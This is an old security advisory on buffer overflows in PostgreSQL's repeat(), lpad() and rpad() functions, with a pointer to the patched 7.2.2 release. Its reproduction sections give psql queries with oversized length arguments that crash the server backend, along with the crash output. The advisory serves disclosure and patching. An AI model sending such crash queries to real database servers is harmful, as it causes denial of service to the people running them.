|
COMMAND PostgreSQL remote and local buffer overflows SYSTEMS AFFECTED all versions PROBLEM In Sir Mordred The Traitor, Mordred Labs advisory [0x0003] and [0x0004] : Bug 1 ===== Upon invoking a repeat() function, a src/backend/utils/adt/oracle_compat.c::repeat() function will gets called which suffers from a buffer overflow. --[ How to reproduce: psql> select repeat('xxx',1431655765); pqReadData() -- backend closed the channel unexpectedly. This probably means the backend terminated abnormally before or while processing the request. The connection to the server was lost. Attempting reset: Failed. Bug 2 ===== There are two buffer overflows in src/backend/utils/adt/oracle_compat.c. 1) lpad(text, integer, text) function 2) rpad(text, integer, text) function --[ Details: The code for this functions is src/backend/utils/adt/oracle_compat.c::lpad() and src/backend/utils/adt/oracle_compat.c::rpad() respectively. The code suffers from a buffer overflow (of course). --[ How to reproduce: shell> pgsql template1 postgres template1=# select version(); version ----------------------------------------------------------- PostgreSQL 7.2 on i686-pc-linux-gnu, compiled by GCC 2.96 (1 row) template1=# create database my_db with encoding='UNICODE'; CREATE DATABASE template1# c my_db You are now connected to database my_db. my_db=# select lpad('xxxxx',1431655765,'yyyyyyyyyyyyyyyy'); pqReadData() -- backend closed the channel unexpectedly. This probably means the backend terminated abnormally before or while processing the request. The connection to the server was lost. Attempting reset: Failed. !# The same for rpad() function. The vulnerable encodings are: EUC_JP, EUC_CN, EUC_KR, EUC_TW, UNICODE, MULE_INTERNAL. SOLUTION Update (26 August 2002) ====== ftp://ftp.postgresql.org/pub/sources/v7.2.2